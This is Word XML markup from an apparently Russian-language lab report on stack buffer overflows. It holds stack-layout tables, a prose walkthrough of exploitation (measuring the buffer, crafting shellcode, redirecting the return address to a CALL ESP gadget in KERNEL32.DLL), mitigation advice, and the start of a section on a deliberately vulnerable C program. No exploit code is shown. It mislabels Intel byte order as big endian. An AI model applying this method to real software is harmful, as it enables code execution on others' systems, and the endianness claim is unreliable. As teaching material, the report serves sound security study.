        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
      </w:tblGrid>
      <w:tr w:rsidR="009513BB" w14:paraId="17A9DAE2" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18307FF7" w14:textId="378ABD88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**env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="074EBA82" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3ED3C2" w14:textId="4AF9C854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**argv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="5D925949" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7255B875" w14:textId="15A978A1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argc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="69F828CF" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52783E3A" w14:textId="7AEDE7C1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EIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="42AACBF0" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7042830F" w14:textId="271A7D32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EBP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="1EB43AA2" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5E88D6" w14:textId="1B38A78D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buf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="7281" w:tblpY="-3650"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
      </w:tblGrid>
      <w:tr w:rsidR="009513BB" w14:paraId="50430904" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D4D02D" w14:textId="77777777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**env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="289E780C" w14:textId="77777777" w:rsidTr="009513BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BDC0E9" w14:textId="77777777" w:rsidR="009513BB" w:rsidRPr="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
            <w:pPr>
              <w:spacing w:before="12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**argv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009513BB" w14:paraId="04F57463" w14:textId="77777777" w:rsidTr="009513BB">
        <w:trPr>
          <w:trHeight w:val="2300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6270302F" w14:textId="77777777" w:rsidR="009513BB" w:rsidRPr="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
            <w:pPr>
              <w:spacing w:before="840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buf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5066E6C5" w14:textId="69D9A9EA" w:rsidR="009513BB" w:rsidRPr="009513BB" w:rsidRDefault="009513BB" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Таблица 1 – структура стека на момент</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 2 – структура стека после </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A9D81" w14:textId="6CF100F9" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:ind w:left="5660" w:hanging="5660"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>вызова</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sample</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">переполнения массива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">в функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sample</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D1FCD" w14:textId="25374EC6" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:ind w:left="3828" w:hanging="4951"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7607C9A4" w14:textId="143D5A73" w:rsidR="009513BB" w:rsidRPr="0091495B" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Переполнение буфера вызывает различные нарушения в работе программы</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64ABCC" w14:textId="77777777" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>аварийное завершение (отказ) программы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95052B" w14:textId="77777777" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>зависание программы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F6448" w14:textId="77777777" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>выполнение произвольного кода с правами пользователя, от имени которого выполняется программа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF42D73" w14:textId="4796396C" w:rsidR="009513BB" w:rsidRPr="0091495B" w:rsidRDefault="009513BB" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В общем виде программные уязвимости типа «переполнение буфера»</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>эксплуатируются следующим образом</w:t>
      </w:r>
      <w:r w:rsidRPr="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A807379" w14:textId="38FB6227" w:rsidR="009513BB" w:rsidRPr="00FC6E93" w:rsidRDefault="00FC6E93" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Нарушителем вычисляется длина буфера. Для этого определяется, при какой длине входного сообщения возникнет ошибка переполнения. Длина входной строки увеличивается до тех пор, пока не появляется системное сообщение об ошибке (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>segmentatiom</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fault</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">). Как только оно появляется, фиксируется адрес, по которому произошла ошибка. Зафиксированный адрес — адрес, на который должен быть перезаписан адрес возврата из функции. Таким образом становятся известны байты входной последовательности, которые при переполнении перезапишут адрес возврата. Байты адреса располагаются в обратном порядке в силу особенностей адресации в архитектуре </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (формат записи "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>big</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>endian</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84D452" w14:textId="5319141D" w:rsidR="00FC6E93" w:rsidRDefault="00FC6E93" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Нарушитель создает шелл-код. В простейшем случае разрабатывается программа на языке С, вызывающая необходимую функцию. Полученный ЕХЕ-файл открывается с помощью дизассемблера (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OllyDbg</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6E93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) и из него переносится шелл-код, включающий набор ассемблерных инструкций, сгенерированных компилятором для вызова</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужной функции, передаваемый в буфер (строку) сразу после адреса возврата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC6FD1" w14:textId="77777777" w:rsidR="00C8626F" w:rsidRDefault="00DF1454" w:rsidP="009513BB">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1454">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Нарушитель организует передачу управления на шелл-код. В регистре </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD08BD3" w14:textId="63F011EC" w:rsidR="00FC6E93" w:rsidRPr="00C8626F" w:rsidRDefault="00DF1454" w:rsidP="00C8626F">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ЕЗР хранится указатель на начало стека, то есть указатель на байт, который является следующим после адреса возврата. Для передачи управления на шелл-код адрес возврата меняется на команду </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4) в системной библиотеке (*.</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">), которая автоматически подгружается к любому процессу (например, </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KERNEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">). Для этого с помощью дизассемблера (например, </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disassembler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) выполняется поиск последовательности байт "</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4" в библиотеке </w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KERNEL</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00694A7B" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Полученный адрес записывается на место байт, которые затирают адрес возврата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAB281" w14:textId="77777777" w:rsidR="00694A7B" w:rsidRDefault="00694A7B" w:rsidP="00694A7B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="1416" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартные функции языка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, такие как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00694A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sprintf</w:t>
      </w:r>
      <w:r w:rsidRPr="00694A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r w:rsidRPr="00694A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">работают </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794CBBD" w14:textId="2ABD392B" w:rsidR="00694A7B" w:rsidRDefault="00694A7B" w:rsidP="00995877">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">со строками без указания их размеров. Для создания безопасного кода </w:t>
      </w:r>
      <w:r w:rsidR="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">следует использовать безопасные версии библиотечных функций, например, </w:t>
      </w:r>
      <w:r w:rsidR="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strncpy</w:t>
      </w:r>
      <w:r w:rsidR="00C8626F" w:rsidRPr="00C8626F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00054A74">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>snprintf</w:t>
      </w:r>
      <w:r w:rsidR="00054A74" w:rsidRPr="00054A74">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00054A74">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>в параметрах которых указывается длина обрабатываемых строк, что позволяет контролировать границы массивов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09363AF4" w14:textId="10353B2E" w:rsidR="00D05CCE" w:rsidRPr="009513BB" w:rsidRDefault="00054A74" w:rsidP="00D05CCE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Существуют — программные средства, которые — способны автоматически выполнять действия, имитирующие переполнение буфера на этапе отладки программы. Существуют и применяются специальные утилиты для автоматического анализа исходных текстов программ на предмет поиска фрагментов кода, уязвимых к атакам типа "переполнение буфера".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE085D" w14:textId="21CE4B4C" w:rsidR="008B183B" w:rsidRDefault="001D4F9A" w:rsidP="004541B3">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59045A3F" w14:textId="013AA6FA" w:rsidR="007949C2" w:rsidRPr="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Разработка уязвимой программы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AC81D" w14:textId="4C03BE75" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработана уязвимая программа на языке С (см. приложение А), которая принимает аргумент командной строки и копирует его в буфер фиксированного размера без проверки длины. Программа компилировалась с отключенными защитами. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193852B1" w14:textId="77777777" w:rsidR="007949C2" w:rsidRDefault="007949C2" w:rsidP="007949C2">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
